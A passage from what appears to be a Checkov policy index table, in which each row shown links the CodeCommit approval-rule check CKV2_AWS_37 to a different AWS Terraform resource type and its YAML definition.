CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 982 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 983 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 984 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 985 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 986 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 987 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 988 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 989 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 990 | CKV2_AWS_37 | resource | aws_redshift_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 991 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 992 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 993 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 994 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 995 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 996 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 997 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 998 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 999 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1000 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1001 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1002 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1003 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1004 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1005 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1006 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1007 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1008 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1009 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1010 | CKV2_AWS_37 | resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1011 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1012 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1013 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1014 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1015 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1016 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1017 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1018 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1019 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1020 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1021 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1022 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1023 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1024 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1025 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1026 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1027 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1028 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1029 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1030 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1031 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1032 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1033 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1034 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1035 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1036 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1037 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1038 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1039 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1040 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1041 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1042 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1043 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1044 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1045 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1046 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1047 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1048 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1049 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1050 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1051 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1052 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1053 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1054 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1055 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1056 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1057 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1058 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1059 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1060 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1061 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1062 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1063 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1064 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1065 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1066 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1067 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1068 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1069 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1070 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1071 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1072 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1073 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1074 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1075 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1076 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1077 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1078 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1079 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1080 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1081 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1082 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1083 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1084 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1085 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1086 | 